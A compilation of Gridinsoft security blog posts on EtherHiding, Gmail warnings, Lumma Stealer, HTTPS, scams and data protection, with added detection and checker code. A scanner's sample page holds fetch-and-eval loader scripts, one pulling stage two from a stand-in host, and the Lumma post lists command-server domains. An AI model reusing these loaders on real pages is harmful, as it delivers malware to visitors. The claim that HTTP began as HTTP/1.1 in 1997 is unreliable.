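  else if (has("eval") && has("sync-xhr")) verdict = "xhr-eval-loader";
  else if (has("eval")) verdict = "eval-present";
  else if (fromChain) verdict = "chain-read";
  return { hits, verdict };
}

function scanPage(html) {
  return extractScripts(html).map(scanScript);
}

// Constructed sample: stage one (contract read), stage two (XHR), and a benign dapp script.
const SAMPLE_PAGE = `
<html><body>
<script>
async function load() {
  let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
      contract = new ethers.Contract("0x0000000000000000000000000000000000000000", [], provider),
      link = await contract.get();
  eval(atob(link));
}
window.onload = load;
</script>
<script>
const get_k_script = () => {
  let e = new XMLHttpRequest();
  return e.open("GET", "https://payload.example/stage2/", !1), e.send(null), e.responseText;
};
eval(get_k_script());
</script>
<script>
async function showBalance() {
  const provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/");
  const token = new ethers.Contract("0x0000000000000000000000000000000000000000",
    ["function balanceOf(address) view returns (uint256)"], provider);
  document.getElementById("bal").textContent = await token.balanceOf("0x0000000000000000000000000000000000000000");
}
</script>
</body></html>`;

if (typeof require !== "undefined" && require.main === module) {
  scanPage(SAMPLE_PAGE).forEach((r, i) =>
    console.log(`script #${i}: ${r.verdict} (${r.hits.join(", ") || "no indicators"})`));
}
```

The third script reads the same chain through the same RPC endpoint but never calls eval(), so it is reported as a plain chain read rather than a loader; the point of the combined verdict is that a legitimate dapp and the EtherHiding stage one differ only in what happens to the bytes after they arrive.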

    Is this new practice dangerous?

    It is hard to estimate the danger this trick brings, but it has several major benefits compared to all other methods adversaries have used in the past.

    The most noticeable among them is that, as I said, Binance Smart Contracts are nearly impossible to take down. Cybercriminals are ready to pay hefty sums to run their infrastructure on “bulletproof hostings”, a common name for hosters that have little to no downtime and do not cooperate with law enforcement. There are a few other criteria, and BSCs satisfy all of them at once. Being based on the blockchain of a huge crypto exchange, they are barely susceptible to DDoS attacks. And they are anonymous: at least, operating smart contracts does not require any personal data, and the contracts do not store any info about their creator.

    One more benefit, which beats even the “classic” bulletproof hostings, is the price. Binance charges fees for creating, modifying and interacting with a contract. But threat actors designed their operations to minimize payments. All they pay is the creation fee and then a fee for each update, but the sum is so small ($0.2 – $0.6) that the attackers can modify things almost daily.

    Overall, this new modus operandi may bring dramatic changes to how malware spreads nowadays. A series of recent disruptions of operations made it clear that the previous model does not have a promising future, to say the least. With the abuse of smart contracts, regardless of the blockchain they are based on, malware spreading may take a sharp upward turn.

    Protecting Against Malicious Binance Smart Contracts

    Although the scheme with malicious Binance contracts looks hard to disrupt, the overall attack consists of numerous steps, and that is where proper anti-malware software is able to intercept and stop the malware. GridinSoft Anti-Malware grants you exceptional protection against both network threats and deeply disguised malware on the disk.

    This Message Seems Dangerous

    Gridinsoft Blog, Wed, 19 Jun 2024. URL: https://gridinsoft.com/blogs/this-message-seems-dangerous/

    Sometimes, Gmail displays a “This Message Seems Dangerous” notification alerting the user that the email seems dangerous, which is obvious. While the banner usually contains more detailed information, this often happens when other users report similar types of emails to Google as “phishing” emails. In other cases, the banner may contain a description like this: “Gmail could not confirm that it actually came from [domain]”, “This may be a spoofed message”, or “[Name] has never sent you messages using this email address”. Let’s have a look at why this error appears and how to prevent it, for both senders and the receiving end.

    How to Fix “Be Careful With This Message” Error

    Gmail does not disclose the logic behind its filters and spam detection, to prevent hackers from bypassing them. When a user sends or receives an email, it goes through Google’s spam filters before reaching the inbox. It is a kind of black box that cannot be turned off. If Google deems the email suspicious, it is flagged with a banner. However, this does not always mean a guaranteed threat; sometimes, the filters flag safe, clean emails.

    If you receive an email and see a “This message seems dangerous” message, try going through the following steps. I begin with the troubleshooting steps for the receiving end.

    Check the Sender

    Before trusting an email, it’s crucial to verify the sender. Sometimes, hackers can disguise their email to appear as if it’s from a legitimate source. Examine the email address for spelling mistakes or characters that closely resemble others, such as a numeric “0” instead of a capital “O” or a lowercase “l” instead of a capital “I”.

    Hackers can spoof an email to make it look like it’s from a trusted source, like Amazon. However, if you look closely at the sender’s email address, you might find that it’s something like Ama.z0n.full@hotmail.com, which is not a legitimate Amazon email address.

    Today, scammers use artificial intelligence to write phishing emails, virtually eliminating errors in the text and other red flags. Nevertheless, when you open the email, look for suspicious signs in the body, such as misspelled names and other spelling mistakes. Remember: banks, social networking sites, and government institutions never contact you for sensitive information via email.

    Is It a Trusted Sender?

    Next, there is one more thing to review to be completely certain about the “This message seems dangerous” notification: check whether the sender is really someone you know. Gmail offers a convenient way to do this. Select Compose in the upper left corner of the Gmail window.

    What to Do?
    Select “Compose”

    Copy the suspicious email address to the “To” field in the new email panel.

    Message Seems Dangerous
    This is a trusted address

    If the address matches a trusted sender with whom you’ve corresponded, their email will appear in the drop-down list. However, if nothing occurs or the emails in the drop-down list don’t match, you’ve probably received a fraudulent email disguised as one from a trusted sender.

    This Message Seems Dangerous -What to Do?
    Fraudulent sender’s address, which is not in the contact list

    If the email is authentic after performing the above checks, click “Looks safe”, and the banner will disappear. This action informs Gmail’s AI that you trust the sender, and it stops displaying the flag. However, sometimes Gmail will not let you click “Looks safe”. Instead, it will only offer the option to “Delete”, or nothing at all, indicating that Gmail has determined the email is malicious.

    If you’re still convinced it’s safe, you must request Google Support to fix the problem. In any case, it’s important to remember that your discretion is key in handling suspicious emails. If you don’t trust the email, don’t click on any links, don’t download any attachments, and don’t reply.

    It’s important to understand that legitimate senders can also send you malware if their email has been compromised. The most reliable option is to contact the sender outside of Gmail and ask them directly if the email came from them.

    Report the Email

    If you determine that the message is a phishing scam, click “Report Dangerous” or “Report Phishing”. This will move the suspicious email to your spam folder and alert Google’s anti-malware team to help prevent similar phishing attacks. The email will be automatically deleted after 30 days, but you can also delete it manually.

    This Message Seems Dangerous - Godaddy
    Select “Report as dangerous”

    Gmail Labeling My Messages As Dangerous

    Now, let’s switch to the point of view of a sender. In some cases, legitimate businesses, especially ones that send newsletters, find Gmail flagging their emails as “dangerous”. This happens because the system is triggered by signs characteristic of spam mailings. The following are possible triggers that cause the banner to appear:

    • Too many recipients (the system often labels chains of emails that way)
    • Too many images
    • Too many attachments
    • Too many hyperlinks
    • Poor grammar/punctuation
    • Your email address is in the spam filter database
    • You have not set up email authentication
    • Your device is infected with malware
    • The email has no unsubscribe button (or link)
    • You are sending it from the corporate domain

    If you’re encountering this issue, remember that you have the power to optimize your email template design. If your emails have a design element, there might be code in your email template that flags them. For example, some chunks in your email that optimize the display on different devices may be suspicious to Gmail:

    /* MOBILE STYLES */
    @media screen and (max-width: 525px) {
      .mobile-hide {
        display: none !important;
      }
    }

    This class is used to hide some elements to make them fit on mobile screens, but it can cause a red banner.

    More Careful Handling

    If you send business emails to a mailing list, checking your rejection and complaint rates is essential. Keep them as low as possible by immediately removing addresses where you received a rejection or complaint from your database. For instance, if none of the user’s emails have been opened in the last six months, consider that an inactive account and stop mailing them.

    You can email fewer people or use Gmail’s “blind carbon copy” (BCC) feature, which hides recipients’ email addresses from each other. This reduces the likelihood of Gmail flagging your email because you won’t be spreading personal information (PII).

    Another important point is allowing recipients to unsubscribe from your mailing list. Ensure your emails always have an “Unsubscribe” link in the footer.

    Set Up Email Authentication

    SPF, DKIM, and DMARC are email authentication methods that confirm to ISPs and mailers that you are authorized to send emails from a particular domain. Verifying an account with SPF, DKIM, and DMARC is vital, and Google also recommends using all three authentication methods.

    These functions are briefly described:

    • SPF (Sender Policy Framework) specifies which IP addresses (or hosts) are allowed to send email on behalf of your domain.
    • DKIM (DomainKeys Identified Mail) ensures that emails traveling from server to server are not tampered with and that the receiving end can verify them.
    • DMARC (Domain-based Message Authentication, Reporting, and Conformance) adds an extra layer of verification by checking whether the SPF and DKIM results match the sender’s domain and defining a policy for messages that fail. You can receive DMARC reports when email verification fails.
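Setting the three records up is only half the job; a record that exists but says the wrong thing (an SPF that ends in +all, a DKIM key with an empty p=, a DMARC policy of p=none) gives receivers no reason to trust the mail. As an added example, not code from the article or from Gridinsoft, the JavaScript below checks SPF, DKIM and DMARC TXT records for the weak settings a sender should look for, and runs it over a constructed weak configuration beside its corrected counterpart. The records, the domain example.com and the placeholder DKIM key are constructed; in a real tool the strings would come from DNS (for instance Node’s dns.resolveTxt).

```javascript
// Added example, not from the article: a checker for the SPF, DKIM and DMARC TXT
// records described above. The records here are constructed samples for a
// placeholder domain; in a real tool they would come from DNS (dns.resolveTxt).

// Split a "tag=value; tag=value" record (DKIM, DMARC) into a map.
function parseTags(txt) {
  const tags = {};
  for (const part of txt.split(";")) {
    const i = part.indexOf("=");
    if (i < 0) continue;
    tags[part.slice(0, i).trim().toLowerCase()] = part.slice(i + 1).trim();
  }
  return tags;
}

function checkSpf(txt) {
  if (!/^v=spf1(\s|$)/i.test(txt.trim())) return ["not an SPF record (missing v=spf1)"];
  const findings = [];
  const terms = txt.trim().split(/\s+/).slice(1);
  const all = terms.find(t => /^[+\-~?]?all$/i.test(t));
  if (!all) findings.push("no 'all' mechanism: unlisted senders get no verdict");
  else if (/^\+?all$/i.test(all)) findings.push("'+all' authorizes every host on the Internet");
  else if (/^\?all$/i.test(all)) findings.push("'?all' is neutral and provides no protection");
  // Mechanisms that cost a DNS lookup; SPF permits at most 10 per evaluation.
  const lookups = terms.filter(t =>
    /^[+\-~?]?(include:|exists:|a(?:[:\/]|$)|mx(?:[:\/]|$)|ptr)/i.test(t) || /^redirect=/i.test(t)).length;
  if (lookups > 10) findings.push(`${lookups} lookup terms exceed the limit of 10 (permerror)`);
  return findings;
}

function checkDkim(txt) {
  const t = parseTags(txt);
  const findings = [];
  if (t.v !== undefined && t.v !== "DKIM1") findings.push(`unexpected version '${t.v}'`);
  if (!("p" in t)) findings.push("no p= tag: this is not a DKIM key record");
  else if (t.p === "") findings.push("empty p= means the key is revoked; signatures will fail");
  if (t.t && t.t.split(":").includes("y")) findings.push("t=y flags the domain as testing; verifiers may ignore failures");
  return findings;
}

function checkDmarc(txt) {
  const t = parseTags(txt);
  if (t.v !== "DMARC1") return ["not a DMARC record (missing v=DMARC1)"];
  const findings = [];
  if (!t.p) findings.push("missing required p= policy tag");
  else if (t.p === "none") findings.push("p=none only monitors; spoofed mail is still delivered");
  if (!t.rua) findings.push("no rua= address: aggregate reports will not arrive");
  if (t.pct !== undefined && Number(t.pct) < 100) findings.push(`pct=${t.pct} applies the policy to only part of the mail`);
  return findings;
}

// Run all three checks; ok is true only when no record produced a finding.
function auditDomain(records) {
  const report = {
    spf: checkSpf(records.spf),
    dkim: checkDkim(records.dkim),
    dmarc: checkDmarc(records.dmarc),
  };
  report.ok = Object.values(report).every(f => f.length === 0);
  return report;
}

// Constructed records: a weak setup beside the corrected one (example.com is a placeholder).
const WEAK_RECORDS = {
  spf:   "v=spf1 include:_spf.example.com +all",
  dkim:  "v=DKIM1; k=rsa; p=",
  dmarc: "v=DMARC1; p=none",
};
const FIXED_RECORDS = {
  spf:   "v=spf1 include:_spf.example.com -all",
  dkim:  "v=DKIM1; k=rsa; p=PLACEHOLDER_BASE64_PUBLIC_KEY",
  dmarc: "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com; pct=100",
};

if (typeof require !== "undefined" && require.main === module) {
  console.log("weak:", JSON.stringify(auditDomain(WEAK_RECORDS), null, 2));
  console.log("fixed:", JSON.stringify(auditDomain(FIXED_RECORDS), null, 2));
}
```

The checker deliberately treats p=none as a finding even though it is a valid DMARC policy: it is the right first step while you collect reports, but as long as it stays there, a receiver such as Gmail learns nothing about what to do with mail that fails SPF and DKIM.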

    Disable Your Antivirus Email Signature

    Some antivirus programs automatically add a digital signature to outgoing emails, confirming they have been scanned and are virus-free. However, this digital signature can conflict with Gmail’s security measures, which leads to flagging your emails as potentially hazardous. Consider disabling the digital signature feature in your antivirus program to see if it resolves the problem.

    Lumma Stealer Spreads Via Fake Browser Updates, Uses ClearFake

    Gridinsoft Blog, Mon, 17 Jun 2024. URL: https://gridinsoft.com/blogs/lumma-stealer-spreads-via-fake-browser-updates/

    Recent research uncovered a selection of websites that deploy Lumma Stealer under the guise of a browser update. They pose as tutorial pages that offer seemingly correct guides, but then open a malicious JS iframe handled by the ClearFake framework. Some of these sites have been active for several weeks now.

    Fake Tutorial Sites Spread Lumma Stealer with ClearFake Framework

    A new spreading campaign of Lumma Stealer apparently started on fake tutorial sites. Avast reports on one specific example of such a page, which uses a JS framework known as ClearFake to trick the user into running a payload. The base website, pchelperspro[.]com, appears to be just a page with instructions for solving an issue with Windows Update, with the rest of the attack happening once the visitor spends a bit more time on it. Though, an attentive user will notice that all buttons on the page are inactive and are in fact lifted from a different site.

    Fake tutorial website
    Looks like just a regular website with a tutorial, but there’s a catch

    After a short timeout, the aforementioned framework kicks in, opening the fake browser update window. The way it functions, as well as the design of the fake update page, makes it particularly hard to think of it as something malicious. If, of course, you are not aware that web browsers never show such windows to begin with. Following the guidance from the fake update window makes the user download and run the malicious PowerShell script.

    The PS script, in turn, connects to the command server, loads the final payload (Lumma Stealer) and executes it. Interestingly enough, the script also performs a chain of actions aimed at system fingerprinting. In particular, it invokes the following system executables:

    C:\Windows\SysWOW64\netsh.exe
    C:\Windows\system32\SecurityHealthService.exe

    Addresses of command servers are encoded into the script text, and initially appear as some sketchy online shops. However, every single one was created just 20 days ago, which is hardly a coincidence.

    Standingcomperewhitwo.shop
    Innerverdanytiresw.shop
    Lamentablegapingkwaq.shop
    Sturdyregularrmsnhw.shop
    Stickyyummyskiwffe.shop
    Greentastellesqwm.shop

    ClearFake and Lumma Stealer Short Overview

    ClearFake is the name of a JavaScript framework that allows creating JS iframes with any needed content, circumventing the web browser’s protective mechanisms. Originally spotted in August 2023, it was massively used in attack campaigns similar to the one I have described above. As in the current campaign, it was used to display an “update your browser” page, with additional customization depending on the browser the victim uses. The only difference now is the use of one-day websites instead of compromised pages, as in the original campaign.

    Fake update website ClearFake
    Appearance of a fake browser update page, built on a ClearFake framework

    Lumma Stealer, on the other hand, is a much more recognizable malicious program. Having appeared just a year ago, in early 2023, it gained significant popularity and fame on the Darknet. Built around the principle of the smallest footprint, it is capable of avoiding detection by antiviruses that rely on the typical activities of spyware. Combined with flexible spreading methods (YouTube promos of cracked software, spam in Discord), this pushed Lumma to its current popularity. In terms of functionality, it is a modular infostealer that collects passwords, session tokens, cryptowallet data, and so on.

    Protect Your Network Browsing & PC Activities

    Using GridinSoft Anti-Malware, you will be able to avoid shady sites and malicious frameworks before they can harm you. Its network security module analyzes activity with multiple detection systems. Continuous database updates keep the program at peak efficiency even against the most recent network threats. Try it out now!

    HTTPS vs HTTP

    Gridinsoft Blog, Sat, 15 Jun 2024. URL: https://gridinsoft.com/blogs/http-vs-https/

    HTTPS and HTTP are constantly around us, but the difference between them is not really clear. How do they differ? And why do I see these “Your connection is not secure” pop-ups when the connection is HTTP? In this article, I will explain the HTTPS vs HTTP difference and what connection type you should stick to.

    HTTPS vs HTTP

    HTTPS and HTTP are two protocols for transferring data between web browsers and servers. The main difference between the two is the level of security and the way data is transmitted. HTTP does not use encryption, so all data is sent and received as is. This makes it vulnerable to being intercepted and read by attackers in a Man-in-the-Middle attack. This protocol is suitable for transmitting publicly available information that does not require protection.

    On the other hand, HTTPS encrypts the transmitted data, providing protection against malicious users reading it. It also utilizes some features, which I will discuss in more detail. This protocol is the standard for transmitting sensitive information and establishing secure connections. Today, almost all websites use HTTPS.

    What Is HTTP?

    HTTP stands for HyperText Transfer Protocol. It is the foundational protocol the World Wide Web uses to transfer and display information on websites. HTTP operates on a client-server model where the browser (client) requests information, and the web server responds with the requested data. HTTP uses port 80 by default for insecure connections and standardized messages to facilitate communication between clients and servers. These messages include methods such as GET, POST, PUT, and DELETE, as well as status codes such as “200 OK”, “400 Bad Request”, “404 Not Found,” and “500 Internal Server Error”.

    Difference HTTPS vs. HTTP? Why is HTTP not secure?
    This is how the connection between the web browser and the server works

    The first version of HTTP was released in 1997 and was called HTTP/1.1. Over time, updated versions of HTTP/2 and HTTP/3 have been released to improve performance and reliability. One of HTTP’s greatest strengths is its simplicity, which makes it easy to develop new applications and services that use HTTP as a base protocol.

    What is HTTPS?

    HTTPS stands for HyperText Transfer Protocol Secure. It is an extension of HTTP designed to provide secure communication over a computer network. HTTPS uses encryption to protect data exchanged between the client and the server. HTTPS uses Transport Layer Security (TLS) or its predecessor, Secure Sockets Layer (SSL), to encrypt the data transmitted between the browser and the server. SSL/TLS certificates contain public and private encryption keys for secure data transfer between browsers and websites. This ensures that even if the data is intercepted, it cannot be read without the decryption key.

    When a user requests a website, the server sends a certificate containing a public key verified by the user’s browser. The browser and server establish a secure connection using a TLS handshake. By default, HTTPS uses port 443 for connections. During this handshake, they agree on a shared secret key that will be used to encrypt and decrypt the data.

    By encrypting data and verifying a website’s identity, HTTPS provides users with a secure way to share and receive information online without worrying about the security of their data. This security makes HTTPS an essential protocol for online transactions, including online banking and e-commerce.

    Why is HTTP Not Safe?

    In fact, the HTTP protocol is hardly used today as it is vastly inferior to HTTPS. First, HTTP does not encrypt data between the server and the client, making it a cakewalk for attackers to intercept your transmitted data. Moreover, HTTP’s lack of authentication makes it a prime target for man-in-the-middle attacks.

    In addition, HTTP does not authenticate the server to which the client is connecting. This allows attackers to spoof websites and trick users into providing sensitive information. When using HTTP, there is no guarantee that data has not been altered during transmission, making attacks aimed at spoofing or modifying data possible.

    How to Verify I’m Using HTTPS?

    To verify that you are using HTTPS when browsing a website, look at the URL in your browser’s address bar. It should start with “https://” instead of “http://”. Also, pay attention to the padlock icon in the address bar, usually to the left of the URL. A closed padlock indicates that the connection is secure.

    HTTPS in the address bar
    The sign you are using HTTPS

    Modern browsers often use additional indicators or visual cues, such as highlighting the address bar in green to show that the site uses HTTPS and has a valid SSL/TLS certificate. You can also click the lock icon for more information about connection security.

    Difference HTTPS vs. HTTP? Why is HTTP not secure?
    If you get to an unsecured website, the browser will warn you

    How to Boost Online Security?

    Improving web browsing safety requires quite a lot of attention, but once you get used to it, the process will become almost unnoticeable. First, be vigilant when surfing the web and use a security solution. Pay attention to the lock icon in the address bar, and do not enter any sensitive data on sites that do not use encryption.

    Another tip here is to use software that can block suspicious and phishing pages. GridinSoft Anti-Malware has a built-in Internet security module to block phishing, scam and other shady pages. Try it out by pressing the banner below!

    Windows Defender Security Warning

    Gridinsoft Blog, Fri, 07 Jun 2024. URL: https://gridinsoft.com/blogs/windows-defender-security-warning/

    “Windows Defender Security Warning” is a scam website that falsely claims your PC is infected and urges you to contact Microsoft tech support. This scam is part of a larger scheme aimed at deploying unwanted software on users’ devices and extracting money for resolving nonexistent issues. It has been around for some time and targets users worldwide.

    Tech support scams represent a particularly notorious type of online fraud, utilizing various tactics to coerce people into making a phone call to a fake support service. The Windows Defender Security Warning scam is one of the most enduring and widespread methods used in these schemes. In this article, I will describe what this scam is, how it operates, and how you can avoid falling victim to it in the future.

    What is Windows Defender Security Warning?

    As mentioned earlier, the Windows Defender Security Warning typically appears as a browser window after clicking a link on a certain website. It displays numerous smaller windows, which are actually non-interactive images. These fake alerts inform the user that their PC is blocked “for security reasons”. In the background, a robotic voice claims the following:

    “Important security message! Your computer has been locked up. Your IP address was used without your knowledge or consent to visit websites that contain identity theft virus. To unlock the computer please call the support immediately. Please do not attempt to shut down or restart your computer. That will lead to data loss and identity theft.”

    Clicking on any of the site elements – which in fairness may happen by accident – switches the website to full screen, with no obvious way out. The Escape key won’t work, and moving the mouse around the screen won’t help either. For a victim who is not aware of combinations like Ctrl+F4, Alt+Tab or Ctrl+Shift+Esc, it may look like a trap. That, along with the sound alert, is what is meant to push the user into following the scam’s guidance and calling “support”.

    Windows Defender Security Warning scam page
    Typical example of a Windows Defender Security Warning page

    As you can see, this is just a scam designed to capitalize on the fear of individuals who may have less knowledge about computer security or computers in general. However, let’s take a closer look at how this scam operates—there are quite a few interesting tactics involved.

    Windows Defender Security Warning Mechanism Explained

    The scam begins by luring users to the Windows Defender Security Warning page. To achieve this, scammers often purchase link placements on dubious websites, such as those hosting pirated movies. A user clicking on a play button or attempting to skip an ad in the video player may be redirected to the scam site.

    The domains hosting this scam can vary widely, but they typically include some mention of Microsoft in the URL. In some egregious instances, fraudsters have even managed to secure hosting from Microsoft themselves. Below, you can find a list of sites used in this scam campaign:


    Once the user lands on the scam site, it typically goes fullscreen and starts playing the previously mentioned audio message. The main goal of this message is to coerce the victim into contacting “tech support” using the phone number displayed on the site, which is mentioned multiple times. The phone call marks the final phase of the scam.

    The so-called support manager begins by instructing the user to download sketchy software purported to resolve the issue—without explaining how the software addresses identity compromise. Throughout the life of this scam, various fraudulent programs have been offered, including SystemKeeper, Driver Updater, and Wise System Mechanic. As expected, all these are pseudo-effective unwanted programs that further prompt users to pay for fixing a myriad of non-existent problems.

    What is the purpose of all this, you might ask? Money is the short and universal answer. The fraudsters posing as tech support managers receive commissions for each user they persuade to download the software. Meanwhile, the developers of this software profit from users purchasing licenses. Considering how long this scam has been active, the monetary turnover is quite substantial.

    How to Protect Against Windows Defender Security Warning Scam?

    The primary advice for protecting against the Windows Defender Security Warning scam and similar schemes is to avoid websites that initiate these scams. As mentioned, the majority of redirects to scam websites originate from pages hosting pirated content. This should be another reason to steer clear of such sites, beyond the fact that content piracy is illegal. Additionally, pirated software or games pose a significant security risk.

    Learn how genuine notifications from security software should look, and how they should not. Neither Microsoft Defender nor other antivirus/antimalware programs issue security notifications through web browsers. None of them will prompt you to call support while appearing to block your computer. And, importantly, no legitimate tech support from any security vendor will ever advise you to install questionable third-party software.

    Use reliable antivirus software with network protection. To prevent scam pages from opening and to ensure your system remains secure regardless of any fake alerts, a robust antivirus solution is essential. GridinSoft Anti-Malware offers excellent malware removal capabilities and network protection, backed by a multi-component detection system and regular updates.

    GridinSoft Anti-Malware main screen

    Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

    After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

    Scan results screen

    Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

    Removal finished

    10 Ways to Protect Your Personal Data https://gridinsoft.com/blogs/protect-your-personal-data/ Tue, 21 May 2024 01:15:57 +0000

    The first hacking attacks, and the realization of how dangerous it is to entrust information to digital media, came as a shock to computer users. That is when the question of data protection arose and the development of the first antivirus programs began, even before the Internet became an everyday thing. Nowadays, when every home is part of the network, protecting data is vital. Here we list and discuss the most effective yet practical data security measures.

    What Is Data Protection?

    People have been practicing data protection since ancient times. Imagine a messenger running from one city to another, carrying a ribbon with seemingly random letters. Or a medieval scribe who makes copies of his manuscripts. Both were protecting data. The runner was using scytale encoding to keep the message from being read by enemies even if he were caught. The scribe made a copy of the text and hid it in a chest to protect it from wind, rain, snow, and thieves. Today we do the same things, but the threats are different.

    Data protection encompasses any measures we take to secure data regardless of where it is stored: on a remote server or a hard disk of our computer. These measures include inputting passwords to any devices or Internet accounts, undergoing biometric authentication, installing antivirus software, conducting regular scans, etc. These measures can be arbitrary or obligatory.

    What Are Data Protection Regulations?

    People’s attitude to the security of their private data can be astoundingly careless. But that is their own problem. By contrast, companies that take responsibility for storing or processing their clients’ personal data (social networks, e-mail providers, state registries, public services, etc.) either oblige themselves or are obliged by law to implement data protection regulations within their workspace. An example of such obligatory guidelines is the GDPR, the General Data Protection Regulation adopted in the European Union in 2018.

    Why Is it Important?

    One can hardly find a modern industry that does not rely on information technology. Criminals and thieves of all sorts now have a new prize – information. Hackers can steal information, destroy it, blackmail owners with its disclosure, or encrypt the data on hacked computers and then demand a ransom from their victims for decrypting it. That last case, the ransomware attack, is the first viable and widely used hacker business scheme. In a world where all of a person’s work, private life, plans, notes, and even dreams become the content of a portable device, the security of that content becomes crucial, and its loss can be devastating.

    Ways to Protect Your Personal Data

    It is very important to remember that although various internet services comply with their data security policies and regulations, users should cooperate with these services and not shift all the responsibility for the safety of their data onto the corporations. The following list of data-safety measures is good for protecting data both on a personal device and in the cloud.

    1. Set up two-factor authentication on your financial accounts.

    Financial accounts are usually better protected than social media profiles, mailboxes, or messengers, but they require more attention and care. A breach of a bank account is something you never want to experience. Therefore, use two-factor authentication in your banking service to protect yourself from fraud, deceptive social engineering, and phishing attacks. All it takes is confirming a prompt on your phone every time you access your banking account. If crooks get hold of your login and password, they still cannot use those credentials without the second factor.

    2. Malware protection is a must.

    Without an anti-malware solution, any system today is defenseless against a jungle of harmful entities. A modern security program will:

    1. warn you about suspicious webpages you are trying to access;
    2. stop you from entering overtly dangerous sites;
    3. quarantine and remove any recognizable malicious programs as soon as they end up on your device;
    4. clear all hidden threats with the help of a deep scan function.

    GridinSoft Anti-Malware is a versatile solution featuring all the described functions and providing consistent protection without inconveniences typical for bulky and “heavy” antivirus programs. Economically beneficial, Anti-Malware is one of the most efficient and quick security programs on the market.


    3. Use a firewall.

    A firewall is a program filter that separates the network it protects from the external environment. It can protect a single computer or an entire workgroup. Most operating systems have a built-in firewall. It controls incoming and outbound traffic using pre-defined rules. Users tend to switch off the firewall temporarily to access suspicious websites and later forget to reactivate the defense. That is dangerous and puts the device or network at risk.

    4. Use free Wi-Fi with care.

    A Wi-Fi access point can be the source of a so-called man-in-the-middle attack that uses a spoofed network name. After you connect to the wrong network by mistake, all the data leaving your device passes through the crooks’ hands. Later your data can be used directly against you, up to identity theft or blackmail, or, in better cases, it can be collected and sold to third parties for their own needs.

    5. Protect your email accounts.

    An email account is the core of any person’s online identity. Profiles in social media and other internet services refer to your email address, and that address is essential for password recovery should you ever need it. Therefore, email safety should be of the utmost concern. Remember to log out of your mailbox on any device other than your own. Also, make sure you use a strong password and change it from time to time.

    6. Update your software regularly.

    Computer software nowadays gets updated automatically or with minimal effort from the user. However, many vulnerabilities emerge in the in-between moments, when one program (say, the operating system) is already updated while some other software is not yet up to date. Such inconsistent versions can lead to a malware infection if cybercriminals choose to exploit them. The most important updates are those of security programs: the more malware signatures an antivirus program has in its libraries, the more malicious items it will remove from your PC before they can do any harm.

    7. Back up your data.

    Keeping a backup of all critical information to guard against physical damage of the drive, loss, or theft is one of the wisest pieces of advice anyone could follow. Anyone who has experienced any of the above knows how important it is to have everything in two or even three copies.

    8. Don’t store passwords on your laptop or mobile device.

    Always consider that your portable device might end up in someone else’s hands. It might be a good person, but a bad person might also steal your device. You must be ready for such an unfortunate event. That means not only that photos and videos you wouldn’t like anyone to see should not be on your device, but above all that passwords should not be stored on it. And don’t forget to log out of all your accounts remotely as soon as you notice your device is gone.

    9. Use Strong, Unique Passwords

    Using strong, unique passwords for each of your online accounts is one of the most effective ways to protect your personal data. Weak passwords are easy for hackers to guess, and using the same password for multiple accounts means that if one account is compromised, all of your other accounts are at risk too.

    Tips for Creating Strong, Unique Passwords:

    • Make It Long: Aim for at least 12 characters. The longer your password, the harder it is to crack.
    • Mix It Up: Use a combination of uppercase letters, lowercase letters, numbers, and special characters (like !, @, #, $).
    • Avoid Obvious Choices: Don’t use easily guessable information like your name, birthdate, or common words like “password” or “123456.”
    • Use a Password Manager: Password managers can create and store complex passwords for you, so you don’t have to remember them all. This ensures each of your passwords is unique and secure.

    Imagine your password is a secret code that only you and your best friend know. Make it something fun and memorable, like a phrase from your favorite book or movie, but change some letters to numbers or symbols.

    Example: If you love the book “Harry Potter”, you could start with “HarryPotterRocks” and make it stronger by adding numbers and symbols: “H@rryP0tt3rR0ck$!”.

    Instead of a single word, think of a sentence or phrase you can remember easily. Make it something silly and fun.

    Example: “MyC@tJumpsOver7Rainbows!” This phrase is long, includes a mix of characters, and is easy to remember because it’s a funny mental image.

    Just like you wouldn’t use the same secret handshake forever, change your passwords from time to time to keep them fresh and secure.
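To make the length and character-mix advice above concrete, here is an added Python checker (not from the Gridinsoft post) that applies the post's own rules and also estimates the brute-force search space in bits, which shows that a long all-lowercase passphrase can out-score a shorter password stuffed with symbols. The denylist of common words is a constructed stand-in for a real breach wordlist.

```python
import math
import re

# Rules stated in the post: at least 12 characters, a mix of upper/lower case,
# digits and symbols, and no obvious words such as "password" or "123456".
MIN_LENGTH = 12
# Constructed denylist for the demo; a real checker would use a breach wordlist.
COMMON_WORDS = {"password", "123456", "qwerty", "letmein"}

CLASS_PATTERNS = {
    "lower": r"[a-z]",
    "upper": r"[A-Z]",
    "digit": r"[0-9]",
    "symbol": r"[^A-Za-z0-9]",
}
# Approximate alphabet size each class contributes to a brute-force search.
CLASS_SIZES = {"lower": 26, "upper": 26, "digit": 10, "symbol": 33}


def character_classes(password: str) -> set:
    """Return the set of character classes actually present in the password."""
    return {name for name, pat in CLASS_PATTERNS.items() if re.search(pat, password)}


def search_space_bits(password: str) -> float:
    """log2 of the brute-force search space implied by length and classes used."""
    alphabet = sum(CLASS_SIZES[c] for c in character_classes(password))
    return len(password) * math.log2(alphabet) if alphabet else 0.0


def contains_common_word(password: str) -> bool:
    # Undo the usual letter-to-symbol swaps (@->a, 0->o, 3->e, $->s, 1->i)
    # so that "P@ssw0rd" is still recognised as "password".
    normalised = password.lower().translate(str.maketrans("@03$1", "aoesi"))
    return any(word in normalised for word in COMMON_WORDS)


def check_password(password: str) -> dict:
    """Apply the post's rules; returns verdict, estimated bits and a problem list."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    missing = set(CLASS_PATTERNS) - character_classes(password)
    if missing:
        problems.append("missing " + ", ".join(sorted(missing)))
    if contains_common_word(password):
        problems.append("contains a common word")
    return {"ok": not problems,
            "bits": round(search_space_bits(password), 1),
            "problems": problems}


if __name__ == "__main__":
    for candidate in ("H@rryP0tt3rR0ck$!", "MyC@tJumpsOver7Rainbows!",
                      "P@ssw0rd", "correcthorsebatterystaple"):
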